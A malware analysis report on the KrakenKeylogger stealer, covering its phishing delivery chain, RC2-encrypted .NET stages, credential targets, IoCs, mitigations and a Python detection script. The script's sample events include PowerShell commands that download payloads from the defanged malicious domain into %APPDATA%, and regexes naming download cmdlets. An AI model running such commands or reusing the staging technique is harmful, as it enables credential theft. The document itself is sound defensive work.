Full Report
Part 1 of the KrakenKeylogger Malware Analysis
Analysis Summary
# Tool/Technique: KrakenKeylogger
## Overview
KrakenKeylogger is a newly observed malware family primarily functioning as an infostealer and keylogger, delivered through a multi-stage phishing attack chain involving obfuscated PowerShell scripts and a staged .NET loader.
## Technical Details
- Type: Malware family (Stealer/Keylogger)
- Platform: Windows
- Capabilities: Phishing delivery, LNK execution, PowerShell script execution, multi-stage payload loading (a .NET executable loading a DLL), credential harvesting (browsers, email clients, FTP clients), keylogging, screenshot capture, exfiltration (FTP, SMTP, Telegram Bot).
- First Seen: The recent campaign detailed in the article (no specific date is given beyond "recent").
## MITRE ATT&CK Mapping
Based on inferred delivery and execution:
- **TA0001 - Initial Access**
  - T1566 - Phishing
    - T1566.001 - Spearphishing Attachment (implied by archive delivery)
- **TA0002 - Execution**
  - T1204.002 - User Execution: Malicious File (LNK execution)
  - T1059 - Command and Scripting Interpreter
    - T1059.001 - PowerShell
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information (PowerShell deobfuscation, .NET resource decryption)
- **TA0007 - Credential Access**
  - T1003 - OS Credential Dumping (implied by credential harvesting)
- **TA0010 - Exfiltration**
  - T1041 - Exfiltration Over C2 Channel (FTP/SMTP/Telegram used for exfiltration)
- **TA0003 - Persistence** (implied by post-exfiltration keylogging/screenshotting)
## Functionality
### Core Capabilities
- **Initial Stage Delivery:** Delivered via a `.zip` archive containing a `.lnk` shortcut file.
- **LNK Execution:** The `.lnk` file executes `PowerShell.exe` with arguments designed to run a highly obfuscated initial PowerShell script.
- **Payload Staging:** The initial PowerShell script deobfuscates the download URL and retrieves a second-stage payload, an HTA file (`se1.hta`); the HTA in turn downloads the final executable (`se1.exe`).
- **.NET Loader (Stage 1):** `se1.exe` is a .NET executable that decrypts an embedded resource (`DataBasePracticalJob`) using RC2 encryption, keyed by the MD5 hash of a hardcoded string.
- **DLL Loading (Stage 2):** The decrypted data reveals a second-stage .NET DLL, which is invoked via its first public exported method.
- **Information Stealing:** The malware harvests email credentials (Outlook, Foxmail, ThunderBird) and browser credentials from numerous browsers (Chrome, Firefox, Opera, Edge, Vivaldi, Brave, etc.).
- **Post-Exfiltration Activity:** After stealing data, the malware initiates continuous keylogging and screenshot capturing.
### Advanced Features
- **Multi-Layered PowerShell Obfuscation:** Utilizes complex string reversal and character manipulation functions to hide the initial download URL.
- **Custom .NET Decryption:** Employs RC2 coupled with a unique key derivation method (MD5 hash of a string encoded as BigEndianUnicode with null byte suffixing).
- **Broad Credential Harvesting:** Supports credential harvesting across a vast array of common email clients and web browsers.
- **Flexible Exfiltration:** Supports exfiltration over FTP, SMTP, and Telegram Bot channels.
## Indicators of Compromise
- File Hashes (SHA-256):
  - Initial ZIP: `79571f0ad832a31a1121f7c698496de7e4700271ccf0a7ed7fe817688528a953`
  - LNK file (`seedof.lnk`): `beec3ec08fba224c161464ebcc64727912c6678dd452596440809ce99c8390fd`
  - Stage 1 Executable (`1st.exe`): `dddaf7dfb95c12acaae7de2673becf94fb9cfa7c2d83413db1ab52a5d9108b79`
  - Stage 2 DLL (`2nd.dll`): `f7c66ce4c357c3a7c44dda121f8bb6a62bb3e0bc6f481619b7b5ad83855d628b`
  - Stage 3 DLL (`3rd.dll`): `43e79df88e86f344180041d4a4c9381cc69a8ddb46315afd5c4c3ad9e6268e17`
  - Final Payload (`Kraken.exe`): `ee76fec4bc7ec334cc6323ad156ea961e27b75eaa7efb4e88212b81e65673000`
- File Names: `Doc signed Subcontract Agreement.zip`, `seedof.lnk`, `se1.hta`; downloaded files are potentially saved in `%APPDATA%`.
- Registry Keys: Not specified.
- Network Indicators:
  - Initial download URL (deobfuscated): `hxxps://masherofmasters[.]cyou/chin/se1.hta`
  - Second-stage download URL (embedded in the .hta): `hxxps://masherofmasters[.]cyou/chin/se1.exe`
- Behavioral Indicators: Execution of `powershell.exe` with extensive arguments, creation of files in `%APPDATA%`, use of `wget` (implied by the PowerShell command), execution of an `.exe` followed by loading of a `.dll` in memory, keylogging activity, and outbound connections for exfiltration via FTP/SMTP/Telegram.
## Associated Threat Actors
- Not explicitly named, but leveraging common phishing/malspam delivery vectors typical of financially motivated threat groups.
## Detection Methods
- Signature-based detection: Use the file hashes provided above.
- Behavioral detection: Monitor for complex, multi-stage PowerShell execution chains involving string reversal/deobfuscation, dynamic file downloads to `%APPDATA%`, and .NET assembly loading in memory.
- YARA rules: Likely feasible, based on the RC2 decryption routine and the hardcoded strings/offsets within the .NET stages.
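The behavioral detection bullet above can be turned into a small triage pass over process-creation telemetry. The following is an added example written for this summary, not code from the original article or from any analysis tooling the author used. It keys on the chain the report describes: a double-clicked LNK shows up as `explorer.exe` spawning `powershell.exe` with a long, obfuscated command line; a download cmdlet (`wget` is the PowerShell alias for `Invoke-WebRequest`) writing under `%APPDATA%`; the HTA stage; and the hashes and domain from the IoC section. The event field names are modelled on a Sysmon event 1 record, the command-line length threshold is an assumed tuning value, and the sample events are constructed (the reversed-URL string is elided, and `mshta.exe` being launched by PowerShell is an assumption, since the report does not say how the HTA is run).

```python
"""Triage pass for the KrakenKeylogger delivery chain (added example, constructed data)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# SHA-256 values and the domain are taken from the IoC section of the report.
KNOWN_SHA256 = {
    "79571f0ad832a31a1121f7c698496de7e4700271ccf0a7ed7fe817688528a953": "initial ZIP",
    "beec3ec08fba224c161464ebcc64727912c6678dd452596440809ce99c8390fd": "LNK (seedof.lnk)",
    "dddaf7dfb95c12acaae7de2673becf94fb9cfa7c2d83413db1ab52a5d9108b79": "stage 1 executable",
    "f7c66ce4c357c3a7c44dda121f8bb6a62bb3e0bc6f481619b7b5ad83855d628b": "stage 2 DLL",
    "43e79df88e86f344180041d4a4c9381cc69a8ddb46315afd5c4c3ad9e6268e17": "stage 3 DLL",
    "ee76fec4bc7ec334cc6323ad156ea961e27b75eaa7efb4e88212b81e65673000": "final payload (Kraken.exe)",
}
KNOWN_DOMAINS = {"masherofmasters.cyou"}

# Generic markers of the string-reversal / character-manipulation obfuscation the
# report describes, and the PowerShell download cmdlets/aliases (wget = Invoke-WebRequest).
OBFUSCATION_RE = re.compile(
    r"\[array\]::reverse|\.tochararray\(\)|\[char\]|-join\b|-replace\b|-enc(?:odedcommand)?\b",
    re.IGNORECASE,
)
DOWNLOAD_RE = re.compile(
    r"\b(?:wget|iwr|curl|invoke-webrequest|downloadstring|downloadfile|start-bitstransfer)\b",
    re.IGNORECASE,
)
APPDATA_RE = re.compile(r"%appdata%|\$env:appdata|\\appdata\\roaming\\", re.IGNORECASE)
LONG_CMDLINE = 150  # assumed threshold in characters; tune per environment


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record; field names modelled on Sysmon event 1 (assumption)."""
    parent_image: str
    image: str
    cmdline: str
    sha256: str = ""


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def refang(text: str) -> str:
    """Normalise defanged IoCs (hxxp, [.]) so the domain check works on either form."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def evaluate(ev: ProcessEvent) -> list[Finding]:
    """Apply each rule to one event and return the rules that fired."""
    findings: list[Finding] = []
    image = ev.image.lower().rsplit("\\", 1)[-1]
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    cmd = refang(ev.cmdline)

    if ev.sha256.lower() in KNOWN_SHA256:
        findings.append(Finding("known_hash", f"{image}: {KNOWN_SHA256[ev.sha256.lower()]}"))

    for dom in KNOWN_DOMAINS:
        if dom in cmd.lower():
            findings.append(Finding("known_domain", dom))

    if image == "powershell.exe":
        # explorer.exe as parent is what a double-clicked .lnk looks like; a long command
        # line carrying several obfuscation markers matches the report's initial script.
        marks = OBFUSCATION_RE.findall(cmd)
        if parent == "explorer.exe" and len(cmd) >= LONG_CMDLINE and len(marks) >= 2:
            findings.append(Finding("obfuscated_ps_from_lnk", f"{len(marks)} obfuscation markers"))
        dl = DOWNLOAD_RE.search(cmd)
        if dl and APPDATA_RE.search(cmd):
            findings.append(Finding("download_to_appdata", dl.group(0)))

    # HTA stage. The report does not state how se1.hta is launched, so this is a
    # general "mshta spawned by PowerShell" rule rather than a report-specific one.
    if image == "mshta.exe" and parent == "powershell.exe":
        findings.append(Finding("mshta_from_powershell", cmd))

    return findings


def triage(events: list[ProcessEvent]) -> dict[str, list[Finding]]:
    """Return rule hits keyed by event index (as a string) for events that fired any rule."""
    return {str(i): hits for i, ev in enumerate(events) if (hits := evaluate(ev))}


# Constructed sample events (not telemetry from the original analysis).
SAMPLE_EVENTS = [
    # 0: LNK -> PowerShell stage; the reversed URL string is elided, only the shape matters.
    ProcessEvent(
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        cmdline=(
            "powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden "
            "-Command \"$s=('<reversed-url-elided>').ToCharArray();[array]::Reverse($s);"
            "$u=-join $s;wget $u -OutFile $env:APPDATA\\se1.hta\""
        ),
    ),
    # 1: HTA stage (launch by PowerShell is an assumption).
    ProcessEvent(
        parent_image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        image=r"C:\Windows\System32\mshta.exe",
        cmdline=r'mshta.exe "C:\Users\victim\AppData\Roaming\se1.hta"',
    ),
    # 2: stage 1 executable, hash as listed in the report's IoC section.
    ProcessEvent(
        parent_image=r"C:\Windows\System32\mshta.exe",
        image=r"C:\Users\victim\AppData\Roaming\se1.exe",
        cmdline=r'"C:\Users\victim\AppData\Roaming\se1.exe"',
        sha256="dddaf7dfb95c12acaae7de2673becf94fb9cfa7c2d83413db1ab52a5d9108b79",
    ),
    # 3: benign admin script launched from the desktop; must not fire.
    ProcessEvent(
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        cmdline=r"powershell.exe -File C:\Scripts\Backup-Profile.ps1",
    ),
    # 4: defanged form of the second-stage URL from the report, to show refang() at work.
    ProcessEvent(
        parent_image=r"C:\Windows\System32\cmd.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        cmdline=r'powershell.exe -c "iwr hxxps://masherofmasters[.]cyou/chin/se1.exe -OutFile $env:APPDATA\se1.exe"',
    ),
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, [(h.rule, h.detail) for h in hits])
```

Each rule on its own is noisy (`-join` appears in plenty of legitimate scripts), so the LNK rule requires a conjunction of parent, length and marker count; the hash and domain rules are exact matches and are the ones to feed straight into blocking.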
## Mitigation Strategies
- **Email Security:** Implement strict email filtering to block `.zip` attachments or archive contents containing LNK files.
- **PowerShell Execution Policy:** Restrict or heavily monitor PowerShell usage, particularly execution from user contexts or scripts downloaded from the internet.
- **Endpoint Detection and Response (EDR):** Configure rules to detect attempts to execute LNK files that spawn shells, or detect suspicious use of `wget`/PowerShell command lines indicating payload retrieval.
- **Application Control:** Restrict execution of unknown binaries downloaded dynamically to user-writable locations like `%APPDATA%`.
- **Browser Security:** Ensure browser security features are active and users are trained against credential harvesting attempts.
## Related Tools/Techniques
- **LECmd:** Used by the analyst to inspect the LNK file structure.
- **Obfuscated PowerShell:** Standard technique used by numerous malware families to bypass static analysis.
- **In-Memory .NET Loading:** Common evasion technique, often used by stealer/RAT payloads to execute subsequent stages without writing them directly to disk (though in this chain `se1.exe` and the subsequent DLL are written to disk).